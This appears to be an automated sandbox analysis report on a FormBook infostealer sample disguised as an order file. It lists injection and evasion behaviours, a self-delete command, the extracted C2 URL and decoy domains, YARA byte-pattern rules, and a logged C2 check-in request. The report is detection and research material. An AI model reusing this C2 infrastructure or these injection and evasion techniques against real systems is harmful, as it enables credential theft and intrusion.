Loading ...

Play interactive tourEdit tour

Analysis Report New-Order 04758485.exe

Overview

General Information

Sample Name:New-Order 04758485.exe
Analysis ID:412322
MD5:ed4361a7909fc65a189b4adaac292991
SHA1:b49fef47c793f39be360ce9a1e2f8bee9e254706
SHA256:914c79c23d30b4df795779800b6e14ac42bec2dc618d11d7c0b526960fc6283c
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • New-Order 04758485.exe (PID: 5632 cmdline: 'C:\Users\user\Desktop\New-Order 04758485.exe' MD5: ED4361A7909FC65A189B4ADAAC292991)
    • New-Order 04758485.exe (PID: 5884 cmdline: C:\Users\user\Desktop\New-Order 04758485.exe MD5: ED4361A7909FC65A189B4ADAAC292991)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 4936 cmdline: /c del 'C:\Users\user\Desktop\New-Order 04758485.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bendhighswimming.com/crdi/"], "decoy": ["propertyjumpstartwebinar.com", "boc-vip.club", "polestarnyc.com", "travelonlinebiz.com", "bukovynaent.com", "bestfashoin.com", "miniindiastore.com", "wehatebillgates.com", "holmescountyjusticecourt.com", "colectivorenovemosjuntos.com", "houstowarehouse.com", "aocsw.com", "sml-uniform.com", "bandanasaint.com", "petposhdeluxe.com", "ezcscpawq.com", "ladiesoption.club", "refixu.com", "selfwrrrth.com", "rovietry.com", "enaoc.com", "karyolaw.com", "diversitymarketingtx.net", "browsersentenderbanco.net", "samtheshepherd.com", "nash-arbitrazh.com", "gampang-kerja.tech", "ereplacementparrts.com", "eventmidasbuy14.com", "sia-rikvel.com", "top2016.net", "686638.com", "ton.blue", "desktower.net", "dbykq020.com", "stack30.com", "tiendasfotoprix.com", "kylesmaier.com", "ekmantsang.com", "jumlasx.xyz", "qingqingyuyin.com", "cdnsubs.xyz", "maxamoose.com", "huelling.com", "xn--bjrnnstet-z2a8q.online", "betale-posten.com", "lalatendu.info", "nochipmanicure.net", "bichat.website", "washington32reds.com", "centrodesaludcrecer.com", "phihoteldeimedaglioni.com", "kilmalliefarms.com", "icecreamsocialwp.com", "mac-makeup.club", "elzooz.com", "iqomw.com", "bestattorneycle.com", "startonsocial.com", "purensoessentials.com", "therealyolandafay.com", "feildwolf.com", "nativesupps.com", "nbatimeout.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.New-Order 04758485.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.New-Order 04758485.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.New-Order 04758485.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        10.2.New-Order 04758485.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.New-Order 04758485.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bendhighswimming.com/crdi/"], "decoy": ["propertyjumpstartwebinar.com", "boc-vip.club", "polestarnyc.com", "travelonlinebiz.com", "bukovynaent.com", "bestfashoin.com", "miniindiastore.com", "wehatebillgates.com", "holmescountyjusticecourt.com", "colectivorenovemosjuntos.com", "houstowarehouse.com", "aocsw.com", "sml-uniform.com", "bandanasaint.com", "petposhdeluxe.com", "ezcscpawq.com", "ladiesoption.club", "refixu.com", "selfwrrrth.com", "rovietry.com", "enaoc.com", "karyolaw.com", "diversitymarketingtx.net", "browsersentenderbanco.net", "samtheshepherd.com", "nash-arbitrazh.com", "gampang-kerja.tech", "ereplacementparrts.com", "eventmidasbuy14.com", "sia-rikvel.com", "top2016.net", "686638.com", "ton.blue", "desktower.net", "dbykq020.com", "stack30.com", "tiendasfotoprix.com", "kylesmaier.com", "ekmantsang.com", "jumlasx.xyz", "qingqingyuyin.com", "cdnsubs.xyz", "maxamoose.com", "huelling.com", "xn--bjrnnstet-z2a8q.online", "betale-posten.com", "lalatendu.info", "nochipmanicure.net", "bichat.website", "washington32reds.com", "centrodesaludcrecer.com", "phihoteldeimedaglioni.com", "kilmalliefarms.com", "icecreamsocialwp.com", "mac-makeup.club", "elzooz.com", "iqomw.com", "bestattorneycle.com", "startonsocial.com", "purensoessentials.com", "therealyolandafay.com", "feildwolf.com", "nativesupps.com", "nbatimeout.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 10.2.New-Order 04758485.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New-Order 04758485.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: New-Order 04758485.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmmon32.pdb source: New-Order 04758485.exe, 0000000A.00000002.343132788.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000002.487945480.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: New-Order 04758485.exe, 0000000A.00000002.343132788.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New-Order 04758485.exe, 0000000A.00000002.343276305.000000000177F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.475859490.0000000004CF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New-Order 04758485.exe, 0000000A.00000002.343276305.000000000177F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000002.487945480.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49707 -> 3.16.197.4:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49707 -> 3.16.197.4:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49707 -> 3.16.197.4:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bendhighswimming.com/crdi/
          Source: global trafficHTTP traffic detected: GET /crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JH HTTP/1.1Host: www.iqomw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.16.197.4 3.16.197.4
          Source: C:\Windows\explorer.exeCode function: 11_2_061B07A2 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JH HTTP/1.1Host: www.iqomw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.iqomw.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 14:01:12 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.331004335.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000B.00000000.331004335.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://logo.verisign
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adb
          Source: New-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1O
          Source: New-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe
          Source: New-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/gO
          Source: New-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cD
          Source: New-Order 04758485.exe, 00000000.00000003.227490070.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cK
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co
          Source: New-Order 04758485.exe, 00000000.00000003.301805201.0000000006F4C000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: New-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobjO
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
          Source: New-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmpString found in binary or memory: http://purl.r
          Source: New-Order 04758485.exe, 00000000.00000002.302817037.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
          Source: New-Order 04758485.exe, 00000000.00000002.302817037.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: New-Order 04758485.exe, 00000000.00000002.302817037.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: New-Order 04758485.exe, 00000000.00000002.302514557.0000000000E68000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
